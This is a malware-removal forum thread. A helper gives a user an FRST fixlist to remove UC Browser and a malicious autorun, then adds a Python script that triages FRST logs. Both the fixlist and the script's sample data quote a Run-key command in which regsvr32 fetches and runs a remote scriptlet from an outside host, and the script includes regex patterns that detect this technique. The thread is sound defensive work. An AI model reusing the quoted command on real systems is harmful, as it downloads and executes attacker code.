Disk: 1 (Size: 6.7 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================




#2 nasdaq

  • Malware Response Team
  • 38,936 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:20 PM

Posted 22 October 2017 - 07:45 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove this program in bold via the Control Panel > Programs > Programs and Features.
UC Browser (HKLM-x32\...\UCBrowser) (Version: 5.2.1369.1410 - UCWeb Inc.)
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [713552 2015-06-25] () <==== ATTENTION
R2 OracleOraDB12Home1TNSListener; C:\app\Veevic\product\12.1.0\dbhome_1\BIN\TNSLSNR [X]
S3 OracleRemExecServiceV2; C:\Users\VEEVIC\AppData\Local\Temp\\oraremservicev2\RemoteExecService.exe [X] <==== ATTENTION
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
Task: {4F71697F-13D7-470D-AF25-92B5590AC54C} - System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11} => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2015-06-25] (UCWeb Inc) <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
2017-08-15 12:02 - 2015-06-25 13:14 - 000713552 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
FirewallRules: [{CBF5125D-8C2A-4F5C-9159-85795B137B14}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
C:\Windows\System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}
C:\Program Files (x86)\UCBrowser
C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.

Please let me know what problem persists with this computer.
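The fixlist above is built from the entries FRST marked "<==== ATTENTION" plus the files and tasks they point at. As an added illustration (this is not FRST's code and not part of the helper's fix), the following Python script reads FRST-style log text, collects the scanner-flagged entries, lists the on-disk files they reference, and separately checks every Run-key value for the pattern seen in this log: regsvr32 fetching a scriptlet from a URL and handing it to scrobj.dll. The sample lines are copied from the log in this thread (FRST prints URLs defanged as hxxp); the one HKLM Run entry for SynTPEnh.exe is constructed to show that a normal autorun does not trigger the check.

```python
"""Triage helper for text produced by FRST (Farbar Recovery Scan Tool).

Added example for this thread; it is not part of FRST or of the fix posted
above. It collects the entries FRST already marked "<==== ATTENTION" and,
independently of that marker, flags Run-key values that start regsvr32 with
a remote scriptlet (/i:<url> ... scrobj.dll), the persistence seen in this
log. Sample lines come from the thread's log, plus one constructed clean
Run entry (SynTPEnh) to show the check does not fire on it.
"""
import re

ATTENTION_MARK = "<==== ATTENTION"

# Registry autorun value as FRST prints it: HKU\<SID>\...\Run: [Name] => command
RUN_VALUE = re.compile(
    r"^(?P<key>HK(?:LM|CU|U)\S*?\\\.\.\.\\Run(?:Once)?): \[(?P<name>[^\]]+)\] => (?P<cmd>.+?)\s*$"
)
# regsvr32 told to fetch a scriptlet from a URL and pass it to scrobj.dll.
# FRST defangs URLs as hxxp, so both spellings are accepted.
REGSVR32_SCRIPTLET = re.compile(
    r"\bregsvr32(?:\.exe)?\b.*?/i:(?P<url>h(?:xx|tt)ps?://\S+).*?\bscrobj\.dll\b",
    re.IGNORECASE,
)
# Windows file path ending in an executable, library or task job file.
FILE_PATH = re.compile(r"[A-Za-z]:\\.+?\.(?:exe|dll|job)(?=\s|$)", re.IGNORECASE)

# Sample input: lines taken from the thread's FRST log, plus one constructed
# clean Run entry (HKLM ... SynTPEnh) that must not be flagged.
SAMPLE_LOG = r"""
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [713552 2015-06-25] () <==== ATTENTION
Task: {4F71697F-13D7-470D-AF25-92B5590AC54C} - System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11} => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2015-06-25] (UCWeb Inc) <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: {59E206AF-91CE-4151-8263-3A5BFD8AB987} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-15] (Google Inc.)
FirewallRules: [{CBF5125D-8C2A-4F5C-9159-85795B137B14}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
"""


def strip_marker(line):
    """Return (entry without FRST's ATTENTION marker, whether it was flagged)."""
    flagged = ATTENTION_MARK in line
    return line.split(ATTENTION_MARK, 1)[0].strip(), flagged


def flagged_entries(log_text):
    """Entries FRST itself marked with <==== ATTENTION, marker removed."""
    return [strip_marker(l)[0] for l in log_text.splitlines() if ATTENTION_MARK in l]


def scriptlet_persistence(log_text):
    """Run-key values whose command is regsvr32 loading a remote scriptlet.

    Checked on every Run entry, not only the flagged ones, so a value the
    scanner's own heuristics missed would still surface for review.
    """
    hits = []
    for raw in log_text.splitlines():
        entry, _ = strip_marker(raw)
        run = RUN_VALUE.match(entry)
        if not run:
            continue
        hit = REGSVR32_SCRIPTLET.search(run.group("cmd"))
        if hit:
            hits.append({"key": run.group("key"), "value": run.group("name"),
                         "url": hit.group("url")})
    return hits


def referenced_paths(entries):
    """Unique on-disk files named by the given entries (what a fix would remove)."""
    paths = set()
    for entry in entries:
        paths.update(FILE_PATH.findall(entry))
    return sorted(paths)


def triage(log_text):
    """Summarise a log: scanner-flagged entries, scriptlet autoruns, files to review."""
    flagged = flagged_entries(log_text)
    return {
        "attention": flagged,
        "scriptlet_persistence": scriptlet_persistence(log_text),
        "paths": referenced_paths(flagged),
    }


if __name__ == "__main__":
    for section, items in triage(SAMPLE_LOG).items():
        print(f"== {section} ({len(items)})")
        for item in items:
            print("  ", item)
```

Run it against a saved FRST.txt by passing the file's contents to `triage()`; the "paths" list is a starting point for the file and task lines of a fixlist, and anything in "scriptlet_persistence" deserves a look at the Run key even when the scanner did not mark it.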

#3 nasdaq

  • Malware Response Team
  • 38,936 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:20 PM

Posted 28 October 2017 - 06:41 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.



